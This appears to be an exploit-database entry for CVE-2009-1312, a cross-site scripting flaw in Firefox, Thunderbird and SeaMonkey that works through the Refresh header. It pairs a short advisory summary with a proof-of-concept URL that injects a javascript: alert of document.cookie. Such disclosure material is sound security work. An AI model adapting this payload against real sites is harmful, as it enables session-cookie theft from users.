[] NeoSense

Mozilla (Multiple Products) - Server Refresh Header Cross-Site Scripting

Author: Olli Pettay
type: remote
platform: linux
port: 
date_added: 2009-04-22 
date_updated: 2014-04-19 
verified: 1 
codes: CVE-2009-1312;OSVDB-53952 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/34656/info

The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey.

Attackers can exploit these issues to bypass same-origin restrictions, obtain potentially sensitive information, and execute arbitrary script code with elevated privileges; other attacks are also possible.

With request to script at web site:

http://www.example.com/script.php?param=javascript:alert(document.cookie)

Which returns in answer the refresh header:

refresh: 0; URL=javascript:alert(document.cookie)